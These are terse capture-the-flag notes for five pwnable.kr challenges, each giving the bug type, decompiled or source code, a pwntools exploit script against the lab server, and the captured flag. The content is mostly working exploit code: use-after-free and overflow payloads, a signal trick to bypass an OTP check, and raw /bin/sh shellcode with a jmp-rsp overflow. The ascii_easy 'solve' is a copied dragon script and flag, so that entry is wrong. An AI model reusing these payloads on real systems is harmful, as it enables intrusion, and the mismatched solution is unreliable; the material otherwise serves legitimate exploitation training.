1.dragon
solve
overflow
while ( *((_BYTE *)ptr + 8) > 0 );
uaf
.text:080488C0 mov eax, [ebp+dragon.dragon.dragon.dragon.dragon]
.text:080488C3 mov eax, [eax]
.text:080488C5 mov edx, [ebp+dragon.dragon.dragon.dragon.dragon]
.text:080488C8 mov [esp], edx
.text:080488CB call eax
.text:080488CD jmp short loc_80488DB
from pwn import *
import time
import sys
if len(sys.argv)<2:
p = process('./dragon')
else:
p = remote('pwnable.kr',9004)
context.log_level='debug'
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(proc.pidof(p)[0],gdbscript='b *0x08048899\nc\n')
def step1(p):
for i in range(0,3):
p.send('1'+'\n')
def step2(p):
for i in range(0,4):
p.send('3'+'\n')
p.send('3'+'\n')
p.send('2'+'\n')
step1(p)
p.send('1'+'\n')
step2(p)
p.send(p32(0x08048dbf))
p.interactive()
flag
MaMa, Gandhi was right! :)
2.login
solve
overflow. v4 [ebp-8h] && a1=12
int v4; // [esp+20h] [ebp-8h].
memcpy(&v4, &input, a1);
s2 = (char *)calc_md5((int)&v2, 12);
from pwn import *
import time
import sys
if len(sys.argv)<2:
p = process('./login')
else:
p = remote('pwnable.kr',9003)
context.log_level='debug'
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(proc.pidof(p)[0],gdbscript='b *0x080492E\nc\n')
system_addr=0x8049284
ppp=0x11111111
input1=0x0811EB3C
p.sendline(b64e(p32(system_addr)+p32(ppp)+p32(input1)))
p.interactive()
flag
control EBP, control ESP, control EIP, control the world~
3.otp
question
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
int main(int argc, char* argv[]){
char fname[128];
unsigned long long otp[2];
if(argc!=2){
printf("usage : ./otp [passcode]\n");
return 0;
}
int fd = open("/dev/urandom", O_RDONLY);
if(fd==-1) exit(-1);
if(read(fd, otp, 16)!=16) exit(-1);
close(fd);
sprintf(fname, "/tmp/%llu", otp[0]);
FILE* fp = fopen(fname, "w");
if(fp==NULL){ exit(-1); }
fwrite(&otp[1], 8, 1, fp);
fclose(fp);
printf("OTP generated.\n");
unsigned long long passcode=0;
FILE* fp2 = fopen(fname, "r");
if(fp2==NULL){ exit(-1); }
fread(&passcode, 8, 1, fp2);
fclose(fp2);
if(strtoul(argv[1], 0, 16) == passcode){
printf("Congratz!\n");
system("/bin/cat flag");
}
else{
printf("OTP mismatch\n");
}
unlink(fname);
return 0;
}
solve
use subprocess to control singal
ulimit -f 0 && python -c "import os, signal; signal.signal(signal.SIGXFSZ, signal.SIG_IGN); os.system('./otp 0')"
or
ulimit -f 0 && python -c "import subprocess; subprocess.Popen(['./otp', ''], stderr=subprocess.STDOUT)"
flag
Darn... I always forget to check the return value of fclose() :(
4.ascii_easy
question
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#define BASE ((void*)0x5555e000)
int is_ascii(int c){
if(c>=0x20 && c<=0x7f) return 1;
return 0;
}
void vuln(char* p){
char buf[20];
strcpy(buf, p);
}
void main(int argc, char* argv[]){
if(argc!=2){
printf("usage: ascii_easy [ascii input]\n");
return;
}
size_t len_file;
struct stat st;
int fd = open("/home/ascii_easy/libc-2.15.so", O_RDONLY);
if( fstat(fd,&st) < 0){
printf("open error. tell admin!\n");
return;
}
len_file = st.st_size;
if (mmap(BASE, len_file, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, fd, 0) != BASE){
printf("mmap error!. tell admin\n");
return;
}
int i;
for(i=0; i<strlen(argv[1]); i++){
if( !is_ascii(argv[1][i]) ){
printf("you have non-ascii byte!\n");
return;
}
}
printf("triggering bug...\n");
vuln(argv[1]);
}
solve
from pwn import *
import time
import sys
if len(sys.argv)<2:
p = process('./dragon')
else:
p = remote('pwnable.kr',9004)
context.log_level='debug'
# context.terminal = ['tmux', 'splitw', '-h']
# gdb.attach(proc.pidof(p)[0],gdbscript='b *0x08048899\nc\n')
def step1(p):
for i in range(0,3):
p.send('1'+'\n')
def step2(p):
for i in range(0,4):
p.send('3'+'\n')
p.send('3'+'\n')
p.send('2'+'\n')
step1(p)
p.send('1'+'\n')
step2(p)
p.send(p32(0x08048dbf))
p.interactive()
flag
MaMa, Gandhi was right! :)
5.echo1
solve
from pwn import *
p = remote('pwnable.kr', 9010)
jmp_esp = asm("jmp rsp",arch='amd64',os='linux')
shellcode="\x31\xf6\xf7\xe6\x52\x52\x52\x54\x5b\x53\x5f\xc7\x07\x2f\x62\x69\x6e\xc7\x47\x04\x2f\x2f\x73\x68\x40\x75\x04\xb0\x3b\x0f\x05\x31\xc9\xb0\x0b\xcd\x80"
p.recvuntil('name? :')
p.sendline(jmp_esp)
p.recvuntil('>')
p.sendline('1')
payload = 'A'* 40 + p64(0x6020a0) + shellcode
p.recvline()
p.sendline(payload)
p.recvuntil('goodbye')
p.interactive()
flag
H4d_som3_fun_w1th_ech0_ov3rfl0w
